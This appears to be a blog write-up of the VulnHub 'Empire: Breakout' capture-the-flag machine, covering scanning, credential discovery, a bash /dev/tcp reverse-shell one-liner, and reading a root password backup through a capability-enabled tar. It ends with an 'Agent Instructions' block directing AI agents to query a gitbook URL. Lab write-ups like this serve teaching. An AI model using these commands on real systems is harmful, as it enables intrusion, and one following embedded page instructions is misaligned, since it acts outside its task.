# Empire : breakout Hello, in this writeup we will solve Empire breakout machine from vulnhub which you can download from the link below {% embed url="" %} machine link {% endembed %} after starting the machine on vmware it will display machine IP address

### First step : gainaing accses by scanning the machine with Nmap `nmap -T5 -p- 192.168.1.108` we will find that ports 80,139,445,10000,20000 are open

So as port 80 is open let's visit the web server running on the machine

a nice apache web server page, so by further searching i found a comment at the end of the page source

the comment says it's an encrypted message, after asking chatgpt to detrmine the algorithm used it told me that the message is encrypted with an algorithm named brainfuck, by decoding the message i found what it seems a password

the decrypted text is .2uqPEfj3D\ . by enumerating the smb running using enum4linux ``` enum4linux -a 192.168.1.108 ```

nice we found a username cyber we now have a username and a password to try we just need a place to log on from the nmap scan we know that a web server is running on port 20000 so by visiting the webserver at `https://192.168.1.108:20000/`

trying credential cyber:.2uqPEfj3D\

and i have got a reverse shell using the following payload from payload all the things `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`

now we have got user flag

### secound step : privesc By searching for binaries with linux capabilties using this command `getcap -r / 2>/dev/null`

Intersting ! there is a tar executable on /home/cyber directory which we can run and this file can access any file on the system and by further enumeration there is an old\_pass.bak file at /var/backups

We can't see the content of old\_pass.bak file as we don't have permission but fortunately we could run tar executable which in order could read any data on the system, so we could compress the file with tar executable and the decompress it again to see it's content `./tar -cvf pass /var/backups/.old_pass.bak` then `cat pass` directly as no need to decompress it again because it's a raw format

now we have got root password which is `Ts&4&YurgtRX(=~h` we can now log in as root

Voila ! we have got the root flag. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xk3rypton.gitbook.io/0xk3rypt0n-blog/penetration-testing/ctf-writeups/vulnhub/empire-breakout.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.